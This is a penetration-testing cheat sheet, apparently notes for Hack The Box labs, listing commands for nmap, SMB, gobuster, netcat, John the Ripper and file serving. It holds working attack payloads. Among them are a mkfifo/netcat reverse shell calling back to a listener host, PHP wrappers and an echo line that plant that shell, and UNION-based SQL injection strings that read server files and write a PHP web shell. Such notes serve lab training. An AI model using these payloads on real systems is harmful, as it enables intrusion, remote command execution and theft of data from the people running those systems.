
HTB

nmap

# The following is an example of the major arguments - do not run it as-is; it takes an eternity because of -sC
nmap -sV -sC -p- -oA nmap_scan_report <ip_addr>

# -sV Version scan (service/version detection)
# -sC Run the default script set for more detailed info
# -p- Scan all TCP ports
# -p80 Scan port 80 only
# -p If -p is not specified then reserved ports 1-1023 are scanned
# --script <script_name> Run a specific NSE script

nmap -sV --open -oA nmap_scan_report <ip_addr>

# --open only report open ports
# -oA write the report to files with the given basename

nmap -sC -p 22,80 -oA nmap_scan_report <ip_addr>
# Script scans are intrusive; it is generally a good idea to run them only against specific ports to save time

nmap -sV --script=http-enum -oA nibbles_nmap_http_enum 10.129.42.190
# enumerate common web directories using the http-enum script

ftp

ftp -p <ip_addr>
# ls
# cd
# get <filename>

snmp

snmpwalk -v 2c -c public <ip_addr> 1.3.6.1.2.1.1.5.0

SMB (Server Message Block)

smbclient -N -L \\\\<ip_addr>
smbclient \\\\<ip_addr>\\users #connection attempt as guest user
smbclient -U bob \\\\<ip_addr>\\users # connection attempt as bob

gobuster

Enumerate directories on a web server

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

searchsploit

searchsploit openssh 7.2

netcat

 nc -lvnp 1234  # start listening for connection in port 1234

-l Listen mode: wait for an incoming connection instead of connecting out.
-v Verbose mode, so that we know when a connection is received.
-n Disable DNS resolution and work with IP addresses only, to speed up the connection.
-p 1234 Port number netcat listens on; the reverse connection should be sent to this port.

nc 10.10.10.1 1234 # connect to remote host port

curl

 curl -s http://ip/users.xml | xmllint  --format -

# fetch the XML with curl and pretty-print it with xmllint

reverse shell


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc remote_ip port >/tmp/f

python3 -c 'import pty; pty.spawn("/bin/bash")' #upgrade to interactive tty
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc remote_ip port >/tmp/f"); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.55 4338 >/tmp/f"); ?>
echo "<?php system (\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.55 4339 >/tmp/f\"); ?>" > r.php

http server (for file sharing; it serves the current working directory, unauthenticated, to anyone who can reach the port, so run it from a dedicated directory and stop it when done - sudo is not needed for a port above 1023)

sudo python3 -m http.server 8080

John the ripper

john -format:RAW-SHA1 -wordlist:rockyou.txt testing.txt

# rockyou.txt - wordlist: https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# testing.txt - file containing the password hash(es) to crack

SQL Injection

'  # Input single tick to check for vulnerability
-- Remember to terminate the payload by commenting out the rest of the query with "-- " (dash dash space)

-- Determine the number of columns returned by the original query - try different counts until no error
a' UNION SELECT 1, 2, 3 --

-- List tables
a' UNION SELECT 1, TABLE_NAME, TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES --

-- List Columns
a' UNION SELECT 1, 2, COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='user_privileges' --

-- File permission setting (secure_file_priv)
a' UNION SELECT 1, 2, variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

-- Current user
a'UNION SELECT 1, 2, USER() --

-- Read file
a' UNION SELECT 1, LOAD_FILE("/var/www/html/index.php"), 3, 4 --

-- Write file
a' UNION SELECT "","",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/dashboard/shell.php'--

File Transfer

ftp server (pyftpdlib serves the current working directory to anonymous clients by default; run it from a dedicated directory and stop it when done)

sudo pip3 install pyftpdlib                            # Install
sudo python3 -m pyftpdlib --port 21 # Run